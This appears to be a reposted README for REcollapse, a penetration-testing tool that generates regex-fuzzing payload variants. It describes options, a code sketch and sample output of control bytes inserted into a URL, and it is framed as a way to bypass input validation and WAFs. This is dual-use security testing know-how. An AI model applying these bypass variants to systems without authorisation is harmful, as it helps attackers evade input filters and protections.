    REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications

    By: Zion3R


    REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications.

    It can also be helpful to bypass WAFs and weak vulnerability mitigations. For more information, take a look at the REcollapse blog post.

    The goal of this tool is to generate payloads for testing. Actual fuzzing shall be done with other tools like Burp (intruder), ffuf, or similar.


    Installation

    Requirements: Python 3

    pip3 install --user --upgrade -r requirements.txt or ./install.sh

    Docker

    docker build -t recollapse . or docker pull 0xacb/recollapse


    Usage

    $ recollapse -h
    usage: recollapse [-h] [-p POSITIONS] [-e {1,2,3}] [-r RANGE] [-s SIZE] [-f FILE]
    [-an] [-mn MAXNORM] [-nt]
    [input]

    REcollapse is a helper tool for black-box regex fuzzing to bypass validations and
    discover normalizations in web applications

    positional arguments:
    input original input

    options:
    -h, --help show this help message and exit
    -p POSITIONS, --positions POSITIONS
    pivot position modes. Example: 1,2,3,4 (default). 1: starting,
    2: separator, 3: normalization, 4: termination
    -e {1,2,3}, --encoding {1,2,3}
    1: URL-encoded format (default), 2: Unicode format, 3: Raw
    format
    -r RANGE, --range RANGE
    range of bytes for fuzzing. Example: 0,0xff (default)
    -s SIZE, --size SIZE number of fuzzing bytes (default: 1)
    -f FILE, --file FILE read input from file
    -an, --alphanum include alphanumeric bytes in fuzzing range
    -mn MAXNORM, --maxnorm MAXNORM
    maximum number of normalizations (default: 3)
    -nt, --normtable print normalization table

    Detailed options explanation

    Let's consider this_is.an_example as the input.

    Positions

    1. Fuzz the beginning of the input: $this_is.an_example
    2. Fuzz before and after special characters (see the sketch after this list): this$_$is$.$an$_$example
    3. Fuzz normalization positions: replace all possible bytes according to the normalization table
    4. Fuzz the end of the input: this_is.an_example$
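
    A hedged sketch of the separator mode (position mode 2) is shown below; it is not REcollapse's own code, and the byte handling and de-duplication are simplified assumptions. It inserts each candidate byte before and after every special character of the input and prints URL-encoded variants, similar in spirit to the example output further down.

    import string

    def separator_variants(text, byte_range=range(0x00, 0x100)):
        variants = set()
        alphanum = string.ascii_letters + string.digits
        for i, ch in enumerate(text):
            if ch in alphanum:
                continue  # only pivot around special characters
            for b in byte_range:
                enc = f"%{b:02x}"
                variants.add(text[:i] + enc + text[i:])          # before the separator
                variants.add(text[:i + 1] + enc + text[i + 1:])  # after the separator
        return sorted(variants)

    for variant in separator_variants("this_is.an_example", range(0x0a, 0x0c)):
        print(variant)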

    Encoding

    1. URL-encoded format to be used with application/x-www-form-urlencoded or query parameters: %22this_is.an_example
    2. Unicode format to be used with application/json: \u0022this_is.an_example
    3. Raw format to be used with multipart/form-data: "this_is.an_example

    Range

    Specify a range of bytes for fuzzing: -r 1-127. This will exclude alphanumeric characters unless the -an option is provided.

    Size

    Specify the size of fuzzing for positions 1, 2 and 4. The default approach is to fuzz all possible values for one byte. Increasing the size will consume more resources and generate many more inputs, but it can lead to finding new bypasses.

    File

    Input can be provided as a positional argument, stdin, or a file through the -f option.

    Alphanumeric

    By default, alphanumeric characters will be excluded from output generation, which is usually not interesting in terms of responses. You can allow this with the -an option.

    Maximum number of normalizations

    Not all normalization libraries have the same behavior. By default, three possibilities for normalizations are generated for each input index, which is usually enough. Use the -mn option to go further.

    Normalization table

    Use the -nt option to show the normalization table.


    Example

    $ recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com
    %0ahttps://legit.example.com
    %0bhttps://legit.example.com
    https%0a://legit.example.com
    https%0b://legit.example.com
    https:%0a//legit.example.com
    https:%0b//legit.example.com
    https:/%0a/legit.example.com
    https:/%0b/legit.example.com
    https://%0alegit.example.com
    https://%0blegit.example.com
    https://legit%0a.example.com
    https://legit%0b.example.com
    https://legit.%0aexample.com
    https://legit.%0bexample.com
    https://legit.example%0a.com
    https://legit.example%0b.com
    https://legit.example.%0acom
    https://legit.example.%0bcom
    https://legit.example.com%0a
    https://legit.example.com%0b

    Resources

    This technique was presented at BSidesLisbon 2022.

    Blog post: https://0xacb.com/2022/11/21/recollapse/

    Slides:

    Videos:

    Normalization table: https://0xacb.com/normalization_table


    Thanks



